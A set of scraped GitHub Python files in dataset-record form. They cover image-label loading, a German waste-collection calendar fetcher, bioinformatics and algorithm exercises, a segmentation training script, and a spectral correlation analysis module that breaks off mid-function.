12)\n\n X_train.append(input_value_crop)\n #Label decoding\n #'1' for car, '0' for not car\n aFileName = os.path.basename(aFile)\n mo = positive_label.search(aFileName)\n if mo:\n labels_train.append(1)\n else:\n labels_train.append(0)\n\n#Converting labels into one hot array\nY_train = np.zeros((len(labels_train), num_classes))\nY_train[np.arange(len(labels_train)),labels_train] = 1\n\nX_train = array(X_train)\n# print(\"labels_id: \",labels_train)\n# print(\"Y_train: \",Y_train)\n# print(\"file_paths: \",file_paths_train)\n\n#Read all the testing images and labels\nX_test = []\nlabels_test = []\n\nfor aFile in file_paths_test:\n #Image decoding\n input_value = cv2.imread(aFile)\n input_value = preprocess_input(input_value)\n #Get a 224x224 from 256x256 image which is center cropped\n input_value_crop = np.zeros((image_size, image_size, 3), dtype=np.float32)\n input_value_crop = crop_center(input_value,image_size,image_size, 0)\n\n X_test.append(input_value_crop)\n #Label decoding\n #'1' for car, '0' for not car\n aFileName = os.path.basename(aFile)\n mo = positive_label.search(aFileName)\n if mo:\n labels_test.append(1)\n else:\n labels_test.append(0)\n\n#Converting labels into one hot array\nY_test = np.zeros((len(labels_test), num_classes))\nY_test[np.arange(len(labels_test)),labels_test] = 1\n\nX_test = array(X_test)\n# print(\"labels_id: \",labels_test)\n# print(\"Y_test: \",Y_test)\n# print(\"file_paths: \",file_paths_test)\n\nprint(\"DATA IMPORT: All the train and test data loaded in X_train, Y_train, X_test, Y_test\")","repo_name":"gnavihs/EyeInTheSky","sub_path":"DataImport.py","file_name":"DataImport.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74146136748","text":"import requests\nfrom waste_collection_schedule import Collection\nfrom waste_collection_schedule.service.ICS import ICS\n\nTITLE = \"Kreiswirtschaftsbetriebe Goslar\"\nDESCRIPTION = \"Source for kwb-goslar.de waste collection.\"\nURL = \"https://www.kwb-goslar.de\"\nTEST_CASES = {\n \"Berliner Straße (Clausthal-Zellerfeld)\": {\"pois\": \"2523.602\"},\n \"Braunschweiger Straße (Seesen)\": {\"pois\": \"2523.409\"},\n}\n\nICON_MAP = {\n \"Baum- und Strauchschnitt\": \"mdi:leaf\",\n \"Biotonne\": \"mdi:bio\",\n \"Blaue Tonne\": \"mdi:newspaper-variant-multiple\",\n \"Gelber Sack\": \"mdi:recycle\",\n \"Restmülltonne\": \"mdi:trash-can\",\n \"Weihnachtsbäume\": \"mdi:pine-tree\",\n}\n\n\nclass Source:\n def __init__(self, pois):\n self.ics = ICS()\n self.pois = pois\n\n def fetch(self):\n r = requests.get(\n url=\"https://www.kwb-goslar.de/output/options.php\",\n params={\n \"ModID\": \"48\",\n \"call\": \"ical\",\n \"pois\": self.pois,\n },\n headers={\n \"Referer\": \"https://www.kwb-goslar.de\",\n },\n )\n\n if not r.ok:\n raise Exception(f\"Error: failed to fetch url: {r.request.url}\")\n\n dates = self.ics.convert(r.text)\n\n entries = []\n for d in dates:\n date, waste_type = d\n icon = ICON_MAP.get(waste_type)\n entries.append(Collection(date=date, t=waste_type, icon=icon))\n\n return entries\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/source/kwb_goslar_de.py","file_name":"kwb_goslar_de.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"71853194666","text":"'''\nCode Challenge: Implement LeaderboardCyclopeptideSequencing.\n Input: An integer N and a collection of integers Spectrum.\n Output: LeaderPeptide after running LeaderboardCyclopeptideSequencing(Spectrum, N).\n-------------------------------------------------\nSample Input:\n10\n0 71 113 129 147 200 218 260 313 331 347 389 460\n-------------------------------------------------\nSample Output:\n113-147-71-129\n\n'''\nmaxn = 6000\nAminoAcids = [[57], [71], [87], [97], [99], [101], [103], [113], [114], [115], [128], [129], [131], [137], [147], [156], [163], [186]]\n\ndef getMass(Peptide):\n\treturn sum(Peptide)\n\t\ndef cyclospectrum(Peptide):\n\tspectrum = []\n\tfor k in range(1,len(Peptide)):\n\t\tfor i in range(len(Peptide)):\n\t\t\telement = Peptide[i:i+k]\n\t\t\tif k-len(Peptide)+i>0:\n\t\t\t\telement += Peptide[:k-len(Peptide)+i]\n\t\t\tspectrum.append(sum(element))\n\tspectrum += [0,sum(Peptide)]\n\tspectrum.sort()\n\treturn spectrum\n\ndef linearSpectrum(Peptide):\n\toutput = []\n\tfor k in range(1,len(Peptide)):\n\t\tfor i in range(len(Peptide)):\n\t\t\telement = Peptide[i:i+k]\n\t\t\toutput.append(sum(element))\n\toutput += [0,sum(Peptide)]\n\treturn output\n\ndef cycScore(Peptide,Spectrum):\n\tTheorSpectrum = cyclospectrum(Peptide)\n\tbucketThSptm = [0]*maxn\n\tfor item in TheorSpectrum:\n\t\tbucketThSptm[item] += 1\n\tbucketSptm = [0]*maxn\n\tfor item in Spectrum:\n\t\tbucketSptm[item] += 1\n\tscore = 0\n\tfor i in range(maxn):\n\t\tif bucketSptm[i]<bucketThSptm[i]:\n\t\t\tscore += bucketSptm[i]\n\t\telse:\n\t\t\tscore += bucketThSptm[i]\n\treturn score\n\ndef linearScore(Peptide,Spectrum):\n\tTheorSpectrum = linearSpectrum(Peptide)\n\tbucketThSptm = [0]*maxn\n\tfor item in TheorSpectrum:\n\t\tbucketThSptm[item] += 1\n\tbucketSptm = [0]*maxn\n\tfor item in Spectrum:\n\t\tbucketSptm[item] += 1\n\tscore = 0\n\tfor i in range(maxn):\n\t\tif bucketSptm[i]<bucketThSptm[i]:\n\t\t\tscore += bucketSptm[i]\n\t\telse:\n\t\t\tscore += bucketThSptm[i]\n\treturn score\n\ndef Trim(Leaderboard,Spectrum,N):\n\tLBwithSocre = []\n\tfor item in Leaderboard:\n\t\tLBwithSocre.append([item,linearScore(item, Spectrum)])\n\tLBwithSocre = sorted(LBwithSocre,key=lambda x:x[1],reverse=True)\n\toutput = []\n\tif N < len(LBwithSocre):\n\t\tscoreLast = LBwithSocre[N-1][1]\n\t\ti = 0\n\t\twhile(LBwithSocre[i][1]>=scoreLast):\n\t\t\toutput.append(LBwithSocre[i][0])\n\t\t\ti+=1\n\t\t\t'''\n\t\t\tif i>=len(LBwithSocre):\n\t\t\t\tbreak\n\t\t\t'''\n\telse:\n\t\toutput = [i[0] for i in LBwithSocre]\n\t\t\t\t\t\n\treturn output\n\t\ndef Expand(Leaderboard):\n\tif Leaderboard == []:\n\t\treturn [i for i in AminoAcids]\n\toutput = []\n\tfor aa in AminoAcids:\n\t\tfor item in Leaderboard:\n\t\t\toutput.append(item+aa)\n\treturn output\n\n\nfrom os.path import dirname\nmassTable = open(dirname(__file__) + 'integer_mass_table.txt').read().strip().split('\\n')\nfor i in range(len(massTable)):\n\tmassTable[i] = massTable[i].split()\n\tmassTable[i][1] = int(massTable[i][1])\nmassTable = dict(massTable)\n\ndataset = open(dirname(__file__) + 'dataset.txt').read().strip().split()\nN = int(dataset[0])\nSpectrum = [int(i) for i in dataset[1:]]\nparentMass = Spectrum[-1]\n\nLeaderboard = []\nLeaderPeptide = []\nflag = True\nwhile(len(Leaderboard)>0 or flag):\n\tflag = False\n\tLeaderboard = Expand(Leaderboard)\n\ttmpLeaderboard = Leaderboard[:] ##deep Copy\n\tfor item in tmpLeaderboard:\n\t\tif getMass(item)==parentMass:\n\t\t\tif cycScore(item, Spectrum) > cycScore(LeaderPeptide, Spectrum):\n\t\t\t\tLeaderPeptide = item\n\t\telif getMass(item)>parentMass:\n\t\t\tLeaderboard.remove(item)\n\tLeaderboard = Trim(Leaderboard,Spectrum,N)\n\t\n\t\n#print(LeaderPeptide)\nfor i in range(len(LeaderPeptide)):\n\tif i != 0:\n\t\tprint('-',end='')\n\tprint(LeaderPeptide[i],end='')","repo_name":"luoguanghao/bioinfo_algo_script","sub_path":"M2_Week4_LeaderboardCyclopeptideSequencing.py","file_name":"M2_Week4_LeaderboardCyclopeptideSequencing.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37058912246","text":"#!/usr/bin/env python3\n\"\"\"Contains the function convolve_channels()\"\"\"\nimport numpy as np\n\n\ndef convolve_channels(images, kernel, padding='same', stride=(1, 1)):\n \"\"\"Performs a convolution on images with channels\n\n Args:\n images (numpy.ndarray),(m,h,w,c): contains images\n m: number of images\n h: height in pixels of images\n W: width in pixels of images\n c: number of channels in image\n kernel (numpy.ndarray),(kh,kw,c): contains kernel for convolution\n kh: height of kernel\n kw: width of kernel\n padding (tuple or str): if 'same', perform same\n if 'valid', perform valid\n if (tuple),(ph,pw):\n ph: padding for height\n pw: padding for width\n stride (tuple),(sh,sw):\n sh: stride height\n sw: stride width\n\n Returns:\n numpy.ndarray containing convolved images\n \"\"\"\n m, h, w, c = images.shape\n kh, kw, output_d = kernel.shape\n sh, sw = stride\n\n if padding == 'same':\n pad_h = (((h - 1) * sh) + kh - h) // 2 + 1\n pad_w = (((w - 1) * sw) + kw - w) // 2 + 1\n elif padding == 'valid':\n pad_h, pad_w = 0, 0\n else:\n pad_h, pad_w = padding\n image_padded = np.pad(\n images, ((0,), (pad_h,), (pad_w,), (0,)), 'constant'\n )\n\n out_h = (h + (2 * pad_h) - kh) // sh + 1\n out_w = (w + (2 * pad_w) - kw) // sw + 1\n output = np.zeros((m, out_h, out_w))\n\n for x in range(out_h):\n for y in range(out_w):\n output[:, x, y] = np.sum(\n kernel * image_padded[:, sh*x: sh*x+kh, sw*y: sw*y+kw],\n axis=(1, 2, 3)\n )\n\n return output\n","repo_name":"kyle-gross/holbertonschool-machine_learning","sub_path":"math/0x03-convolutions_and_pooling/4-convolve_channels.py","file_name":"4-convolve_channels.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16154085723","text":"# Solution 1\n# O(nLog(n) + mLog(m)) time / O(1) space\n# n - length of first array\n# m - length of seccond array\n\ndef smallestDifference(arrayOne, arrayTwo):\n arrayOne.sort()\n arrayTwo.sort()\n idxOne = 0\n idxTwo = 0\n smallest = float(\"inf\")\n current = float(\"inf\")\n smallestPair = []\n while idxOne < len(arrayOne) and idxTwo < len(arrayTwo):\n firstNum = arrayOne[idxOne]\n secondNum = arrayTwo[idxTwo]\n if firstNum < secondNum:\n current = secondNum - firstNum\n idxOne += 1\n elif firstNum > secondNum:\n current = firstNum - secondNum\n idxTwo += 1\n else:\n return [firstNum, secondNum]\n return smallestPair\n","repo_name":"casp3rus/100DaysOfAlgo","sub_path":"018SmallestDifference/smallestDifference.py","file_name":"smallestDifference.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24101714937","text":"from codes.train_routines import train_semantic_segmentation_net, train_instance_segmentation_net, train_multitask_loss_net\nfrom codes.test_routines import quick_seg_inst_test, test_semantic_w_instance\nfrom parameters import training_parameters, parse_arguments, dataset_specific_parameters\nfrom codes.utils.resample import resample\nfrom codes.utils.batch_testing import batch_test, read_plots, show_side_results\n\n############################################################# Networks ######################################################################################\nnetwork_list = [\"unet\", \"rnet\", \"dlv3_net\", \"unet_double\", \"unet_double_multi\", \"unet_double_multi_learned_center\", \"unet_double_bandwidth\", \"unet_double_multi_fixed\"]\n\n############################################################# Datasets ######################################################################################\n# datasets = [\"2016_r\", \"AFRL\", \"Sangids\", \"Nuclei\", \"2016_s\"]\ndatasets = [\"2016_s\", \"2016_r\", \"Sangids\", \"AFRL\", \"voids\"]\n\n\nargs = parse_arguments(network_list, datasets)\nargs = dataset_specific_parameters(args)\nparameters = training_parameters(args)\nparameters.not_so_big = False\n\n############################################################# TRAIN ######################################################################################\nif(args.network < 3):\n if(args.mode == \"train_s\"):\n train_semantic_segmentation_net(parameters, args.training_dir, args.training_masks)\n elif(args.mode == \"train_i\"):\n train_instance_segmentation_net(parameters, args.training_dir, args.training_masks)\n elif(args.mode == \"train\"):\n train_semantic_segmentation_net(parameters, args.training_dir, args.training_masks)\n train_instance_segmentation_net(parameters, args.training_dir, args.training_masks)\nelse:\n if(args.mode == \"train\"):\n train_multitask_loss_net(parameters, args.training_dir, args.training_masks)\n\nprint(args.subsample)\n####################################\nif(args.subsample != '.'):\n resample(parameters, resample_masks=2, factor=2, directory=args.subsample)\n exit()\n####################################\n\n############################################################# TEST ######################################################################################\nif(args.mode == \"quick\"):\n if(args.debug):\n mini_V, final_pred, final_fibers, final_clusters, mini_gt, seg_f1, ins_f1, ins_f1_object_wise, Ra = quick_seg_inst_test(parameters, start_point=args.start_point)\n else:\n mini_V, final_pred, final_fibers, mini_gt, seg_f1, ins_f1, ins_f1_object_wise, Ra = quick_seg_inst_test(parameters, start_point=args.start_point)\n final_clusters = None\n parameters.save_quick_results(mini_V, final_pred, final_fibers, mini_gt, seg_f1, ins_f1, final_clusters=final_clusters)\nelif(args.mode == \"test\"):\n parameters.save_side = 1\n parameters.not_so_big = True\n # parameters.testing_mask = None\n # AFRL data length = 320\n # AFRL data length = 128\n mini_V, final_pred, final_fibers, mini_gt, seg_f1, ins_f1 = test_semantic_w_instance(parameters, length=128)\n final_clusters = None\n parameters.save_quick_results(mini_V, final_pred, final_fibers, mini_gt, seg_f1, ins_f1, final_clusters=final_clusters)\nelif(args.mode == \"resample_v\"):\n resample(parameters, resample_masks=0, factor=2)\nelif(args.mode == \"resample_m\"):\n resample(parameters, resample_masks=1, factor=2)\nelif(args.mode == \"resample_r\"):\n resample(parameters, resample_masks=2, factor=2)\n\nelif(args.mode == \"batch\"):\n batch_test(parameters, args)\nelif(args.mode == \"plots\"):\n read_plots(parameters.dataset_name)\n\nelif(args.mode == \"custom\"):\n network_architectures = [-2]\n\n datasets_options = [2]\n datasets_versions = [0, 1, 2]\n\n for n in network_architectures:\n for dt in datasets_options:\n for dt_v in datasets_versions:\n if(n == -1):\n # debug cluster multi\n args.debug_cluster = 1\n args.network = 4\n elif(n == -2):\n # debug cluster double\n args.debug_cluster = 1\n args.network = 0\n args.loss = 1\n elif(n == 0.5):\n # debug cluster offset\n args.loss = 1\n else:\n args.network = n\n\n args.dataset_number = dt\n args.dataset_version = dt_v\n args.dataset_name = datasets[args.dataset_number]\n args = dataset_specific_parameters(args)\n parameters = training_parameters(args)\n batch_test(parameters, args)\n\nelif(args.mode == \"compare\"):\n show_side_results(parameters.dataset_name, parameters.dataset_version)\n\nelse:\n print(\"Option {} not understood\".format(args.mode))\n","repo_name":"camilo-aguilar/Fiber-detection-cnn-and-geometric-regularization","sub_path":"main_cvpr.py","file_name":"main_cvpr.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22295603138","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 9 14:54:34 2020\r\n\r\n@author: Mekkering\r\n\"\"\"\r\n\r\n#\r\nimport os, numpy as np, csv, matplotlib.pyplot as plt, scipy.optimize as opt, math, struct, binascii, gc, time, random\r\nimport multiprocessing\r\nfrom operator import sub\r\nfrom joblib import Parallel, delayed\r\nimport scipy#, lmfit\r\nfrom scipy.optimize import minimize # used for implementation of maximum likelihood exponential fit\r\nfrom matplotlib import gridspec\r\nimport matplotlib.colors as mcolors\r\nfrom math import factorial\r\nfrom math import *\r\nfrom scipy.stats import poisson\r\nfrom scipy import fftpack\r\nimport matplotlib as mpl\r\nimport pickle\r\nimport numba as nb\r\nfrom joblib import Parallel, delayed\r\nimport multiprocessing\r\nfrom tqdm import tqdm\r\nimport pandas as pd\r\nfrom scipy.interpolate import interp1d\r\nfrom scipy.signal import savgol_filter\r\nimport re\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport matplotlib as mpl\r\nfrom lmfit.models import LorentzianModel, GaussianModel, VoigtModel, LinearModel, ConstantModel\r\n#mpl.rcParams['figure.dpi']= 300\r\nimport socket #enables to find computer name to make less of a mess with folders\r\n# %matplotlib auto\r\n\r\n\r\n#first functions I defined myself\r\n#mainly the fitting the timeaveraged stuff, correlation maps, cartesian to polar and fourier transforms of the correlation maps as also described in my reprot\r\ndef fittimeaverage(timeaverage,wavelengths,model):\r\n #only done to extract minimum background from timeaverage\r\n if model=='Gauss':\r\n lormod = GaussianModel(prefix='Gauss_')\r\n elif model=='Lor':\r\n lormod = LorentzianModel(prefix='Lor_')\r\n elif model=='Voigt':\r\n lormod = VoigtModel(prefix='Voigt_')\r\n \r\n\r\n pars = lormod.guess(timeaverage, x=wavelengths)\r\n \r\n constmod = ConstantModel(prefix='Const_') \r\n pars.update(constmod.make_params())\r\n \r\n mod = lormod + constmod\r\n \r\n init = mod.eval(pars, x=wavelengths)\r\n out = mod.fit(timeaverage, pars, x=wavelengths)\r\n \r\n \r\n plt.figure()\r\n plt.plot(wavelengths,timeaverage,label='experimental data')\r\n # plt.plot(wavelengths, out.init_fit, 'k--', label='initial fit')\r\n plt.plot(wavelengths,out.best_fit,label='best fit')\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Intensity')\r\n plt.legend(loc=0)\r\n \r\n return np.min(out.best_fit)\r\n\r\n\r\n \r\n \r\ndef fitspectra(binnedspectra,wavelengths,startfit,endfit,model,Debugmode=False):\r\n# binnedspectra is the array of timebins and wavelength bins\r\n #debugmode false/true for individual plots\r\n timeaverage = np.sum(binnedspectra,axis=1)\r\n if model=='Gauss':\r\n lormod = GaussianModel(prefix='Gauss_')\r\n elif model=='Lor':\r\n lormod = LorentzianModel(prefix='Lor_')\r\n elif model=='Voigt':\r\n lormod = VoigtModel(prefix='Voigt_')\r\n \r\n\r\n pars = lormod.guess(timeaverage, x=wavelengths)\r\n \r\n constmod = ConstantModel(prefix='Const_') \r\n pars.update(constmod.make_params())\r\n \r\n mod = lormod + constmod\r\n \r\n init = mod.eval(pars, x=wavelengths)\r\n out = mod.fit(timeaverage, pars, x=wavelengths)\r\n \r\n \r\n plt.figure()\r\n plt.plot(wavelengths,timeaverage,label='experimental data')\r\n # plt.plot(wavelengths, out.init_fit, 'k--', label='initial fit')\r\n plt.plot(wavelengths,out.best_fit,label='best fit')\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Intensity')\r\n plt.legend(loc=0)\r\n \r\n \r\n print('time averaged fit results',out.fit_report()) #with the outputs obtained here, fill in the next section as guess\r\n fitreport=out.fit_report()\r\n \r\n amplitude = float(fitreport.split('amplitude:')[-1].split('+')[0])\r\n # amplitudeerr = float(fitreport.split('amplitude:')[-1].split('+/-')[1].split('(')[0])\r\n center = float(fitreport.split('center:')[-1].split('+')[0])\r\n # centererr = float(fitreport.split('center:')[-1].split('+/-')[1].split('(')[0])\r\n sigma = float(fitreport.split('sigma:')[-1].split('+')[0])\r\n # sigmaerr = float(fitreport.split('sigma:')[-1].split('+/-')[1].split('(')[0])\r\n \r\n\r\n \r\n pars_amplitude = amplitude\r\n pars_center = center#these values are generated based on the above section. Look at print fitreport\r\n pars_sigma = sigma\r\n \r\n \r\n peakamplitude = np.zeros(endfit-startfit)\r\n peakamplitudeerr = np.zeros(endfit-startfit)\r\n peakcenter = np.zeros(endfit-startfit)\r\n peakcentererr = np.zeros(endfit-startfit)\r\n peaksigma = np.zeros(endfit-startfit)\r\n peaksigmaerr = np.zeros(endfit-startfit)\r\n \r\n if Debugmode==True: \r\n plt.figure()\r\n \r\n for spec in tqdm(range(startfit,endfit)):\r\n lormod = LorentzianModel()\r\n pars = lormod.guess(binnedspectra[:,spec]-np.min(binnedspectra[:,spec]), x=wavelengths)\r\n pars['amplitude'].set(value=pars_amplitude)\r\n pars['center'].set(value=pars_center)\r\n pars['sigma'].set(value=pars_sigma)\r\n \r\n # pars['fwhm'].set(value=14, min=5, max=20)\r\n # pars['height'].set(value=100, min=0, max=400)\r\n \r\n constmod = ConstantModel(prefix='Const_')\r\n pars.update(constmod.make_params())\r\n mod = lormod + constmod\r\n \r\n init = mod.eval(pars, x=wavelengths)\r\n out = mod.fit(binnedspectra[:,spec]-np.min(binnedspectra[:,spec]), pars, x=wavelengths)\r\n \r\n fitreportspec = out.fit_report()\r\n \r\n peakamplitude[spec] = float(fitreportspec.split('amplitude:')[-1].split('+')[0])\r\n peakamplitudeerr[spec] = float(fitreportspec.split('amplitude:')[-1].split('+/-')[1].split('(')[0])\r\n peakcenter[spec] = float(fitreportspec.split('center:')[-1].split('+')[0])\r\n peakcentererr[spec] = float(fitreportspec.split('center:')[-1].split('+/-')[1].split('(')[0])\r\n peaksigma[spec] = float(fitreportspec.split('sigma:')[-1].split('+')[0])\r\n peaksigmaerr[spec] = float(fitreportspec.split('sigma:')[-1].split('+/-')[1].split('(')[0])\r\n \r\n \r\n if Debugmode==True:\r\n \r\n plt.plot(wavelengths,binnedspectra[:,spec]-np.min(binnedspectra[:,spec]))\r\n # plt.plot(wavelengths1, init, 'k--', label='initial fit')\r\n plt.plot(wavelengths,out.best_fit,label='best fit spec '+str(spec))\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Intensity')\r\n # plt.legend()\r\n plt.show()\r\n \r\n return peakamplitude,peakamplitudeerr,peakcenter,peakcentererr,peaksigma,peaksigmaerr\r\n\r\n\r\n\r\n\r\ndef add_colorbar(im, aspect=20, pad_fraction=0.5, **kwargs):\r\n \"\"\"Add a vertical color bar to an image plot, which is aligned to the figure. Simply use add_colorbar(im) with im representing imshow\"\"\"\r\n divider = axes_grid1.make_axes_locatable(im.axes)\r\n width = axes_grid1.axes_size.AxesY(im.axes, aspect=1./aspect)\r\n pad = axes_grid1.axes_size.Fraction(pad_fraction, width)\r\n current_ax = plt.gca()\r\n cax = divider.append_axes(\"right\", size=width, pad=pad)\r\n plt.sca(current_ax)\r\n return im.axes.figure.colorbar(im, cax=cax, **kwargs)\r\n\r\n \r\ndef gaussian(x,A,mean,sigma,background):\r\n return A**2 / (sigma*np.sqrt(2*np.pi))*np.exp(-1 / 2 * (np.square((x-mean)/sigma**2)))+background\r\n\r\n\r\ndef rebin(arr, binning,):\r\n # reshapes the array. If you increase the binning, then your array will be smaller because binning means how many things you would like to average over\r\n # calculates the mean of a certain array to produce a binning by reshaping the array\r\n numberspectra,numberwavelengths = arr.shape[1],arr.shape[0]\r\n shape = arr.reshape(int(numberspectra/binning),numberwavelengths,binning)\r\n mean = np.mean(shape,axis=2)\r\n meanreshaped = mean.reshape(numberwavelengths,int(numberspectra/binning))\r\n\r\n return meanreshaped\r\n\r\n\r\n \r\n\r\ndef spectralcorrelation(spectra1,spectra2,wavelengthsspectra1,wavelengthsspectra2,taus,plot):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n spectra1 : TYPE Array\r\n Data to be correlated with spectra2. Make sure to use a shape of (amount of wavelengths, amount of time bins)\r\n spectra2 : TYPE Array\r\n Data to be correlated with spectra1. Make sure to use a shape of (amount of wavelengths, amount of time bins)\r\n wavelengths : TYPE Array\r\n All the wavelengths of interest. Is used to display the photon pair correlation map.\r\n taus : TYPE list of taus that you are interested to see \r\n DESCRIPTION.\r\n plot : TYPE String of text.\r\n Type of plot you are interested to see. You can choose between 'corr' (correlation map), 'cov' (covariance map), 'norm' (normalization map), 'all' (all maps)\r\n\r\n Returns\r\n -------\r\n covariance : TYPE Array\r\n Covariance of the calculates taus. \r\n normalization : TYPE Array\r\n Normalization based on the standard deviations of the two types of lists. Calculates the outer product of the two times the length of the list (in time direction)\r\n correlation : TYPE Array\r\n Correlation (covariance divided by the normalization)\r\n\r\n Notes\r\n -------\r\n By choosing a part of spectra1 and spectra2, you can get postselection (and the average and normalization is adjusted on that)\r\n \"\"\"\r\n\r\n\r\n\r\n\r\n covariance = np.zeros((len(taus),len(spectra1),len(spectra2))) #saves the covariances, correlations for different taus\r\n normalization = np.zeros((len(taus),len(spectra1),len(spectra2)))\r\n correlationtemp = np.zeros((len(taus),len(spectra1),len(spectra2)))\r\n normlambda1 = np.zeros((len(taus),len(spectra1)))\r\n normlambda2 = np.zeros((len(taus),len(spectra2)))\r\n \r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for t in range(0,len(spectra1[0])-tau):\r\n covariance[i] += np.outer(spectra1[:,t],spectra2[:,t+tau])\r\n normlambda1[i,:] += spectra1[:,t]\r\n normlambda2[i,:] += spectra2[:,t+tau]\r\n normalization[i] = np.outer(normlambda1[i],normlambda2[i])*len(spectra1[0])+1 #the idea of the +1 was simply having to many dark counts which are averaged out and resulted in almost division by 0 errors. Nevertheless this also does not seem to work really properly actually.\r\n correlationtemp[i] = np.divide(covariance[i],normalization[i])\r\n \r\n correlation = np.zeros((len(taus),len(spectra1),len(spectra2))) \r\n #here I use the correction for the decaying component in the spectra. Basically, due to non-overlapping stuff this creates a worse correlation than actually true. In order to circumvent that, either the data along the wavelength axes should be increased, or you have to do some correction (which are the lines below)\r\n for i in tqdm(range(len(taus))):\r\n tau = taus[i]\r\n for t in range(0,len(spectra1[0])-tau):\r\n correlation[i] = correlationtemp[i]/(1-tau/len(spectra1[0]))\r\n \r\n minwavspec1 = np.min(np.delete(wavelengthsspectra1.ravel(),np.where(wavelengthsspectra1.ravel()<=1))) #done to select the wavelength on the correct axis\r\n maxwavspec1 = np.max(np.delete(wavelengthsspectra1.ravel(),np.where(wavelengthsspectra1.ravel()<=1))) # I dont want to construct a map with all zeros\r\n minwavspec2 = np.min(np.delete(wavelengthsspectra2.ravel(),np.where(wavelengthsspectra2.ravel()<=1)))\r\n maxwavspec2 = np.max(np.delete(wavelengthsspectra2.ravel(),np.where(wavelengthsspectra2.ravel()<=1)))\r\n \r\n if plot=='corr': #with the string you can select which graphs you would like to see\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Correlation map. tau = '+str(taus[i]))\r\n # if savefig=True: #attempt to save figures on the fly\r\n # plt.savefig('E:/Martijn/ETH/results/20200310_PM111_specdiffusion/QD2/Correlation_map_tau'+str(tau)+'_excitation',dpi=800) \r\n elif plot=='cov':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(covariance[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Covariance map. tau = '+str(tau))\r\n elif plot=='norm':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(normalization[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Normalization map. tau = '+str(tau)) \r\n \r\n elif plot=='all':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Correlation map. tau = '+str(taus[i]))\r\n \r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(covariance[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Covariance map. tau = '+str(tau))\r\n \r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(normalization[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Normalization map. tau = '+str(tau))\r\n \r\n else: #means that you dont want to see any plot\r\n pass\r\n \r\n return covariance, normalization, correlation \r\n \r\n\r\ndef pearsoncorrelation(spectra1,spectra2,wavelengthsspectra1,wavelengthsspectra2,taus,plot='None'):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n spectra1 : TYPE Array\r\n Data to be correlated with spectra2. Make sure to use a shape of (amount of wavelengths, amount of time bins)\r\n spectra2 : TYPE Array\r\n Data to be correlated with spectra1. Make sure to use a shape of (amount of wavelengths, amount of time bins)\r\n wavelengths : TYPE Array\r\n All the wavelengths of interest. Is used to display the photon pair correlation map.\r\n taus : TYPE list of taus that you are interested to see \r\n DESCRIPTION.\r\n plot : TYPE String of text.\r\n Type of plot you are interested to see. You can choose between 'corr' (correlation map), 'cov' (covariance map), 'norm' (normalization map), 'all' (all maps)\r\n\r\n Returns\r\n -------\r\n covariance : TYPE Array\r\n Covariance of the calculates taus. \r\n normalization : TYPE Array\r\n Normalization based on the standard deviations of the two types of lists. Calculates the outer product of the two times the length of the list (in time direction)\r\n correlation : TYPE Array\r\n Correlation (covariance divided by the normalization)\r\n\r\n Notes\r\n -------\r\n By choosing a part of spectra1 and spectra2, you can get postselection (and the average and normalization is adjusted on that)\r\n \"\"\"\r\n #at the moment I still need to think about whether to let the function crash when the time dimension is not the same length for spectra1 and 